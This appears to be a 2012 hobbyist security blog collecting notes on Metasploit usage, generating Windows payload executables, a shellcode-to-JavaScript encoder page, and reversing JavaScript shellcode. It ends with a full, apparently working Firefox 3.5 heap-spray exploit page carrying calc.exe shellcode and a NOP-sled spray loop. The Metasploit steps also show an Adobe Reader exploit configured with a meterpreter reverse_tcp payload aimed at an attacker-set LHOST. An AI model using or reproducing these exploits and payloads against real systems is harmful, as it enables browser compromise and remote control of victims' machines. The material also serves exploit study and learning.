
Saturday, April 28, 2012

metasploit usage

1. Download and install it.
2. open the metasploit console
windows: go to programs
linux: type msf<tab>; it will show you the commands

3. Go to the metasploit website, search for a vulnerability, and download the specific version of the application.

4. It will look like this:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit



5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe

6. In this case, if your shell code executes, the calculator will show up on your screen.

Convert binary Shell code to Javascript percentage encoding


<html>
<head>
<script language="JavaScript" type="text/javascript">
function ConvertShellCode(strdata)
{
    // Normalise the pasted hex dump: drop whitespace, backslashes and the
    // 'x' of each "\x" prefix so that only hex digits remain.
    var hex = String(strdata).replace(/[\s\\x]/g, '');
    var units = [];

    // Every four hex digits become one %uXXXX unit with the two byte pairs
    // swapped (little-endian order). An analyst decoding such a string does
    // the reverse: strip "%u" and swap each byte pair back.
    for (var pos = 0; pos < hex.length; pos += 4) {
        units.push('%u' + hex.substr(pos + 2, 2) + hex.substr(pos, 2));
    }

    // Output goes straight into the second textarea of the form.
    document.forms.ShellToJavascript.decode.value = units.join('');
}
</script>
</head>
<body>
<form name="ShellToJavascript" method="post">
<textarea rows="10" cols="100" name="encode"></textarea><br />
<textarea rows="10" cols="100" name="decode"></textarea><br />
<input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" />
</form>
</body>
</html>

http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/

Tuesday, April 24, 2012

How to write Shell Code; Reverse Shell code

http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

use Metasploit to generate shell code

This post explains how to use metasploit to generate binary shell code:

http://www.backtrack-linux.org/forums/showthread.php?t=35480


msf > use windows/exec
msf payload(exec) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none

msf payload(exec) > set cmd taskkill /PID 12345
cmd => taskkill /PID 12345
msf payload(exec) > show options

Module options:

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   CMD       taskkill /PID 12345  yes       The command string to execute
   EXITFUNC  process              yes       Exit technique: seh, thread, process, none

msf payload(exec) > generate -h
Usage: generate [options]

Generates a payload.

OPTIONS:

    -E        Force encoding.
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -e <opt>  The name of the encoder module to use.
    -f <opt>  The output file name (otherwise stdout)
    -h        Help banner.
    -i <opt>  the number of encoding iterations.
    -k        Keep the template executable functional
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The Platform for output.
    -s <opt>  NOP sled length.
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -x <opt>  The executable template to use

msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe
[*] Writing 73802 bytes to /root/windows-exec-payload.exe...
msf payload(exec) > generate -f /root/windows-exec-payload.shellcode
[*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...

Thursday, April 19, 2012

Reverse Java Script Shell Code

http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html

It is a detailed post, but one thing I do not understand is the SpiderMonkey part.

After using SpiderMonkey to translate the original percent-encoded data, the result is totally different from the original data.

However, one comment on this post points out that we only need to remove the "%u" and then reverse the order of the original data.

Not sure which way is correct.

But it is very good post for reverse JS shell code.

BTW, I installed SpiderMonkey on CentOS without any problem.

Heap Spray Attack

http://1337day.com/exploits/9493

Vulnerability + NOP sleds + Shell Code

e.g., This is an exploitation HTML file targeting Firefox 3.5.
It uses a heap spray attack to launch calc.exe on Windows platforms.
The same vulnerability exists in the same version of Firefox on Linux, but the shellcode needs to be modified.


<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                          
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>

/* Calc.exe */
// %u-encoded payload: unescape() turns each %uXXXX into one 16-bit code
// unit, so in memory (UTF-16 little-endian) the raw bytes are the two hex
// pairs of each unit swapped. The trailing units %u6163%u636C%u652E%u6578
// decode to the ASCII string "calc.exe", matching the label above.
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                       "%u652E%u6578%u9000");


/* Heap Spray Code */          
// Filler block: the 16-bit value 0x0c0c twice. It is doubled until its
// length passes 0x40001 UTF-16 units, so the loop ends at 0x80000 units.
// oneblock, sprayContainer and i are implicit globals (no var).
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
    fullblock += fullblock;
}
// 600 copies of (filler + shellcode) are kept referenced in sprayContainer,
// which is what the "spray" part of the page title refers to.
// Detection note: a repeating unescape()'d 0x0c0c filler grown in a
// doubling loop and stored into a large array is a classic heap-spray
// signature that content scanners and browser telemetry can flag.
sprayContainer = new Array();
for (i=0; i<600; i++)
{
    sprayContainer[i] = fullblock + shellcode;
}
// Filled in by DataTranslator() below.
var searchArray = new Array()

function escapeData(data)
{
 // Percent-escape only the characters that are significant in a query
 // string (& ? = % and space); every other character passes through as-is.
 var out = '';
 for (var k = 0; k < data.length; k++) {
  var ch = data.charAt(k);
  out += /[&?=% ]/.test(ch) ? escape(ch) : ch;
 }
 return out;
}

function DataTranslator(){
    // Rebuild the global searchArray from the DOM: slot 0 is a dummy entry,
    // slot i+1 holds the innerHTML of the first <font> inside the i-th <p>
    // under #content (or stays empty when that <p> has no <font>).
    // pTags and oTags are implicit globals (no var).
    // NOTE(review): nothing here is obviously the crash trigger; presumably
    // walking these elements after the spray is what drives the browser bug
    // the page references -- confirm against the linked advisory.
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0)
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0])
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}

function GenerateHTML()
{
    // Concatenates the escaped "str" entries of searchArray, skipping the
    // dummy slot 0. The local `html` is never returned or used, so the only
    // effect is the sequence of escapeData() calls; `i` is an implicit
    // global shared with the spray loop above.
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }  
}
// Entry point: populate searchArray from the DOM, then walk it.
DataTranslator();
GenerateHTML();
</script>
</body>
</html>
<html><body></body></html>